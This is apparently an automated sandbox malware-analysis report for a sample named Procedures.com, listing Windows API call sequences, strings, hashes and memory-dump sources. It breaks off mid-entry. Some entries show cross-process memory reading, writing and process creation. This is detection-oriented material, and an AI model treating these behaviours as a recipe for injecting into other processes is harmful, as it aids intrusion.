                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-3228143211
                                                                                                                                                                                                                                                                                                    • Opcode ID: b540b88cff5b019bb0e13a19d69b290ddf77cfc847baa62511470556aec052e7
                                                                                                                                                                                                                                                                                                    • Instruction ID: a016b8b55fb85ec863a4ae6322713438df6de36d666e1d7da6b519b20f5a516a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b540b88cff5b019bb0e13a19d69b290ddf77cfc847baa62511470556aec052e7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A915E75A04226CFCB14CF59E890AA9B7F2FF98314F24915ADA45B7350D731EA82CF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CALLARGARRAY$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 157775604-1875210186
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ddc05502eb97a8a13f8e61fdcc7111ac6b50dc36662ee880abd48683abd2677
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f8e8b50d8309542e57f03d1c4a61d4efb8451c7457e5acc3b14a4dff4eb0d9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ddc05502eb97a8a13f8e61fdcc7111ac6b50dc36662ee880abd48683abd2677
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89419071A00115DFCB04DFA8C885AEEBBF5FF5A314F146069E405BB261E770AD41CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E82B1D,?,?,00000034,00000800,?,00000034), ref: 00E8BDF4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E830AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E82B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E8BDBF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E8BD1C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E8BD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E8BD42
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8311A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E83167
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\139308\Procedures.com,00000104), ref: 00E51AD9
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E51BA4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E51BAE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                    • API String ID: 2506810119-2720841247
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E8CBB1
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00E8CBF7
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EF29C0,011962C0), ref: 00E8CC40
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EBDCD0,00000000,?,?,?,?), ref: 00EB4F48
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 00EB4F65
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB4F75
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EA3AD4,?,?), ref: 00EA3DD5
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EA3AD7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA3AF8
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00EA3B63
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ffd0fd218b0069b7d9675271f68721171622bc9ce1df632ed416f34cc03d5e0
                                                                                                                                                                                                                                                                                                    • Instruction ID: cdb8136658d0e1c54eaa13b8e0e543eea9aaba0cf969962176aad3849404867d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ffd0fd218b0069b7d9675271f68721171622bc9ce1df632ed416f34cc03d5e0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD3181756002019FCB20CF79C585AAA77E2EF1A318F249159F816AF6A2D731EE45C770
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EB49DC
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EB49F0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB4A14
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7a350447e113b501e466d7557cc71893d08688e4a9fd3d5f0e81bacdf0c38b6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 999372cc37739e99bf2d4047ac62c3b7630c26f8cfb0929cd1a0dc333bc311e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a350447e113b501e466d7557cc71893d08688e4a9fd3d5f0e81bacdf0c38b6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021BF72600229ABDF168F94CC42FEB3BA9EF88718F111214FA157B1D1DAB1E855DB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EB51A3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EB51B1
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB51B8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9fbdb01ba0d559806bca4328e98d7bcaa4dd869aaf3b49a7fcce902123b5c35e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 018507c76ca0f4a94cea707ff041a6d0bc2d33e12f98cb91b47b5a7ff9e43eae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fbdb01ba0d559806bca4328e98d7bcaa4dd869aaf3b49a7fcce902123b5c35e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E92192B5601649AFDB01DF28DC81EB737EDEB99368F041149FA00AB361CB70EC15CAA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EB42DC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EB42EC
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EB4312
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0fb870c99f56c93f3dde53839a70369b33c1ae9f42815f5c17398855e48bfb0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: bfe27e7cfbc6a2fa323072099394b2c0e8a2720df6cd42b11d4d9485d8afecf8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fb870c99f56c93f3dde53839a70369b33c1ae9f42815f5c17398855e48bfb0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21B072604218BBEF128F94CC85FFB3BAEEF89754F119124F900AB1E1CA719C5197A0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00E9544D
                                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E954A1
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00EBDCD0), ref: 00E95515
                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 00EB8339
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00EB802F,00000000), ref: 00EB83B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                    • String ID: ($(
                                                                                                                                                                                                                                                                                                    • API String ID: 3814560230-3881858432
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EB4CED
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EB4D02
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EB4D0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E83712
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E83723
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: GetCurrentThreadId.KERNEL32 ref: 00E8372A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E83731
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00E838C4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8373B: GetParent.USER32(00000000), ref: 00E83746
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00E8390F
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00E83987), ref: 00E83937
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00E25A34
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,00E237B8,?,?,?,?,?,00E23709,?,?), ref: 00E25A91
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                    • String ID: <)$<)
                                                                                                                                                                                                                                                                                                    • API String ID: 2587070983-10615988
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EB6360
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EB638D
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00EB639C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,00EF28E0,00EBAD55,000000FC,?,00000000,00000000,?), ref: 00EB823F
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00EB8247
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00EB82B4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 3601265619-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 00EB8576
                                                                                                                                                                                                                                                                                                    • CreateAcceleratorTableW.USER32(00000000,?,?,?,00E9BE96,00000000,00000000,?,00000001,00000002), ref: 00EB858C
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,00E9BE96,00000000,00000000,?,00000001,00000002), ref: 00EB8595
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 986409557-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EF4038,00EF407C), ref: 00EB8C1A
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00EB8C2C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: 8@$|@
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-2203533388
                                                                                                                                                                                                                                                                                                    • Opcode ID: e789fc49072fcedc2db399fe1ab6b6b33f3685dc04ca8f35b8dc0902b781f7f0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 251750062d7d2e8dd5a4925a20f4ce7ae9c0a135fe01d42238a8dec4aaee61c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e789fc49072fcedc2db399fe1ab6b6b33f3685dc04ca8f35b8dc0902b781f7f0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F054F2645314BEE3106B626C46F773E9CEB54350F411021BB08F51D2DA764C04C6BA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
